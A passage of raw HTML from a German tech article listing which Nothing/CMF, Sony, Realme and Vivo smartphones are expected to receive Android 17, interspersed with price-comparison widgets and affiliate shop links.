							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8icGhEqz-cqtiDOfdN0LnJe3tbSWKwr5ZyVHi3YQbcb6RmIsvl8L8WDjxifXFdegop5eUIvJnUoU1aS_Grmyoa1cnLOKHQtLgbSIMOpzMWSx1W2pOuolXrkpeyIRTOAbzpD-r0hpcP3&amp;mid=685718974035&amp;id=685718974035&amp;ts=20260621&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8icGhEqz-cqtiDOfdN0LnJe3tbSWKwr5ZyVHi3YQbcb6RmIsvl8L8WDjxifXFdegop5eUIvJnUoU1aS_Grmyoa1cnLOKHQtLgbSIMOpzMWSx1W2pOuolXrkpeyIRTOAbzpD-r0hpcP3&amp;mid=685718974035&amp;id=685718974035&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="483,00 €" data-vars-product-vendor="Boomstore" aria-label="Deal anschauen bei Boomstore für 483,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>484,70 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ooTOk5YCN0Vf28VzW0Dp4eF8ZBoGX1q25VjufAGN321g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dcxFuC2QtpVlm9TTwaD3QnDedh1yRrcs2SlYNCzDNcK5pT31QxUCj5_Jy4HCy7jhQJO-b31T0VW8&amp;mid=685794725996&amp;id=685794725996&amp;ts=20260621&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ooTOk5YCN0Vf28VzW0Dp4eF8ZBoGX1q25VjufAGN321g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dcxFuC2QtpVlm9TTwaD3QnDedh1yRrcs2SlYNCzDNcK5pT31QxUCj5_Jy4HCy7jhQJO-b31T0VW8&amp;mid=685794725996&amp;id=685794725996&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="484,70 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 484,70 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/10729.png" alt="expert TechnoMarkt" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>629,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YzxInn91D91RDMrEUYsO-mQnNIX1NRd4EhQVZZd5KNT5p11Pk4U7aXy7k3EX0blZokZKpwcYI7dcxFuC2QtpVnSc2NQCIo16SffqMmBoYgZBn4uyyYMND4n0AtweNGU7w&amp;mid=685718974030&amp;id=685718974030&amp;ts=20260621&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=YzxInn91D91RDMrEUYsO-mQnNIX1NRd4EhQVZZd5KNT5p11Pk4U7aXy7k3EX0blZokZKpwcYI7dcxFuC2QtpVnSc2NQCIo16SffqMmBoYgZBn4uyyYMND4n0AtweNGU7w&amp;mid=685718974030&amp;id=685718974030&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="629,00 €" data-vars-product-vendor="expert TechnoMarkt" aria-label="Deal anschauen bei expert TechnoMarkt für 629,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>799,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Swrd8EwUigUXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyQg2cqzA_6OqxW8IPYfl_ysAszGJUFjxwnAFdJOw8W1_ij4zEsGsvjgrdTR5qeKtym-2C0mWzvbw&amp;mid=685701612771&amp;id=685701612771&amp;ts=20260621&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Swrd8EwUigUXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyQg2cqzA_6OqxW8IPYfl_ysAszGJUFjxwnAFdJOw8W1_ij4zEsGsvjgrdTR5qeKtym-2C0mWzvbw&amp;mid=685701612771&amp;id=685701612771&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="799,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 799,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Motorola</span>
													</div>
												<div class="price-comparison__price ">
						<span>799,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.motorola.com/de/de/p/phones/motorola-edge/motorola-edge-70/pmipmjc43m9" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.motorola.com/de/de/p/phones/motorola-edge/motorola-edge-70/pmipmjc43m9" data-vars-product-price="799,99 €" data-vars-product-vendor="Motorola" aria-label="Deal anschauen bei Motorola für 799,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Nothing / CMF</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378efa02cdf"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Nothing-Phone-4a-Pro-7.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Nothing Phone 4a Pro 7" class="wp-image-3093077" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Der Hersteller Nothing beziehungsweise CMF geht beim Design seiner Smartphones zwar einen eigenwilligen Weg, hält sich bei der Angabe verfügbarer Android-Updates aber an ein klares Prinzip. Alle Modelle erhalten mindestens drei große Android-Updates:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3089770/nothing-phone-4a-test.html" target="_blank" rel="noreferrer noopener">Phone 4a</a></li>



<li><a href="https://www.pcwelt.de/article/3099920/nothing-phone-4a-pro-test-2.html" target="_blank" rel="noreferrer noopener">Phone 4a Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2633627/nothing-phone-3a-test.html" target="_blank" rel="noreferrer noopener">Phone 3a</a></li>



<li><a href="https://www.pcwelt.de/article/2633499/nothing-phone-3a-pro-hands-on.html" target="_blank" rel="noreferrer noopener">Phone 3a Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2002927/nothing-phone-2-test.html" target="_blank" rel="noreferrer noopener">Phone (2)</a></li>



<li><a href="https://www.pcwelt.de/article/2259040/nichts-telefon-2a-test.html" target="_blank" rel="noreferrer noopener">Phone 2a</a></li>



<li><a href="https://www.pcwelt.de/article/2425610/nothing-phone-2a-test.html" target="_blank" rel="noreferrer noopener">Phone 2a Plus</a></li>



<li><a href="https://www.pcwelt.de/article/2768762/cmf-phone-2-pro-test.html" target="_blank" rel="noreferrer noopener">CMF Phone 2 Pro</a></li>
</ul>



<p><strong>Kein Android 17 mehr:</strong> Nothing Phone (1), CMF Phone 1.</p>



<p><strong>Nothing Phone 4a im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>347,78 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=l55uVgcAmtiVf28VzW0Dp4eF8ZBoGX1q9rgR98byRVs1g7_hVoNHUkzJ7qk5fi_BFKfpa4qJRMyFpBa9FdUkCCwPDT8AJsGUw2V-OBS6X81SacX3_ODkWoCBtFGaKvpZjRUCfbgq_BWAZJDmuINrRwl0EGfRgUmYznRzjb2RSOS&amp;mid=686123691126&amp;id=686123691126&amp;ts=20260621&amp;log=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=l55uVgcAmtiVf28VzW0Dp4eF8ZBoGX1q9rgR98byRVs1g7_hVoNHUkzJ7qk5fi_BFKfpa4qJRMyFpBa9FdUkCCwPDT8AJsGUw2V-OBS6X81SacX3_ODkWoCBtFGaKvpZjRUCfbgq_BWAZJDmuINrRwl0EGfRgUmYznRzjb2RSOS&amp;mid=686123691126&amp;id=686123691126&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="347,78 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 347,78 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Nothing</span>
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=48017&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://de.nothing.tech/products/phone-4a" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=48017&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://de.nothing.tech/products/phone-4a" data-vars-product-price="349,00 €" data-vars-product-vendor="Nothing" aria-label="Deal anschauen bei Nothing für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>349,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=azoguGva3Degvrhhe5GGHdSkzWVq7p-uNVErWYGn16Jk_4BwBhYN2q6BZ-N7lfpxZjSGCy28nozu7Lge72st2rJBOkIB5Xcerjbd2SezuqyN-biuHJl385X-Mj7TASBB_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686242461246&amp;id=686242461246&amp;ts=20260621&amp;log=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=azoguGva3Degvrhhe5GGHdSkzWVq7p-uNVErWYGn16Jk_4BwBhYN2q6BZ-N7lfpxZjSGCy28nozu7Lge72st2rJBOkIB5Xcerjbd2SezuqyN-biuHJl385X-Mj7TASBB_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686242461246&amp;id=686242461246&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="349,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 349,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>389,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0GHNXX9WY?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Nothing Phone (4a)" data-vars-product-id="3084724" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="20418" data-vars-manufacturer="Nothing" data-vars-vendor="amazon,billiger,gtin,mpn,Nothing" data-vars-po="amazon,billiger,gtin,mpn" data-product="3084724" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0GHNXX9WY?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="389,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 389,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Sony</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378efa07e9a"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/07/Sony-Xperia-1-VII-review-13.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Sony Xperia 1 VII review 13" class="wp-image-2864514" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Sony kommuniziert besonders transparent, welche Smartphones noch Android-Updates erhalten. Daher ist die Liste hier sehr verlässlich.</p>



<p>Diese Geräte bekommen Android 17:</p>



<ul class="wp-block-list">
<li>Xperia 10 VII</li>



<li>Xperia 10 VI</li>



<li><a href="https://www.pcwelt.de/article/3007641/sony-xperia-1-vii-test.html" target="_blank" rel="noreferrer noopener">Xperia 1 VII</a></li>



<li>Xperia 1 VI</li>
</ul>



<p><strong>Kein Update auf Android 17:</strong> Xperia 1 IV, Xperia 1 V, Xperia 5 IV, Xperia 5 V, Xperia 10 V.</p>



<p><strong>Sony Xperia 1 VII im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Sony</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.499,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.sony.de/smartphones/products/xperia-1m7" data-vars-product-name="Sony Xperia 1 VII" data-vars-product-id="2815293" data-vars-category="Smartphones" data-vars-manufacturer-id="10057" data-vars-manufacturer="Sony" data-vars-vendor="amazon,Sony" data-vars-po="amazon" data-product="2815293" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.sony.de/smartphones/products/xperia-1m7" data-vars-product-price="1.499,00 €" data-vars-product-vendor="Sony" aria-label="Deal anschauen bei Sony für 1.499,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Realme</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378efa11948"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/PXL_20250904_104601692.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Realme GT 7 Dream Editon skärm" class="wp-image-2901166" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Der chinesische Hersteller Realme macht keine allzu genauen Angaben zu kommenden Updates, liefert aber voraussichtlich Android 17 auch an folgende Modelle aus:</p>



<ul class="wp-block-list">
<li>Realme 16 / Pro / Pro+</li>



<li>Realme 15 / 15T / Pro </li>



<li>Realme 14 / 14 T/ Pro / Pro+</li>



<li>Realme 13 / 13T/ Pro / Pro+</li>



<li>P4 / P4 Pro</li>



<li>Realme GT 8 / <a href="https://www.pcwelt.de/article/3056055/realme-gt-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Realme GT 7 / 7T / Pro</li>



<li>Realme GT 6 / 6T / Pro</li>
</ul>



<p><strong>Eher kein Android 17:</strong> Realme GT Neo 5, GT Neo 3.</p>



<p><strong>Realme GT8 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>899,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FRF5YQ86?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Realme GT8 Pro" data-vars-product-id="2997169" data-vars-category="Smartphones" data-vars-manufacturer-id="20716" data-vars-manufacturer="Realme" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="2997169" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FRF5YQ86?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="899,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 899,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.099,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=eUdk9xN6rLqRDMrEUYsO-lVt6WZAp33cQ4j59AJG0lZ1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlt4tJlURbdhUQG3hB2yttjos5z0-TRl3wiGAL2rwUZdU6UbQhTdBmv22jqWFOTG_V&amp;mid=685845173703&amp;id=685845173703&amp;ts=20260621&amp;log=rss" data-vars-product-name="Realme GT8 Pro" data-vars-product-id="2997169" data-vars-category="Smartphones" data-vars-manufacturer-id="20716" data-vars-manufacturer="Realme" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="2997169" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=eUdk9xN6rLqRDMrEUYsO-lVt6WZAp33cQ4j59AJG0lZ1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlt4tJlURbdhUQG3hB2yttjos5z0-TRl3wiGAL2rwUZdU6UbQhTdBmv22jqWFOTG_V&amp;mid=685845173703&amp;id=685845173703&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.099,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.099,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Vivo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378efa16e17"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Vivo-X300-Pro-hands-on-2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Vivo X300 Pro hands on 2" class="wp-image-2941609" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Der chinesische Smartphone-Hersteller Vivo kann eine Vielzahl von Modellen vorweisen, und einige davon bekommen voraussichtlich auch das Update auf Android 17:</p>



<ul class="wp-block-list">
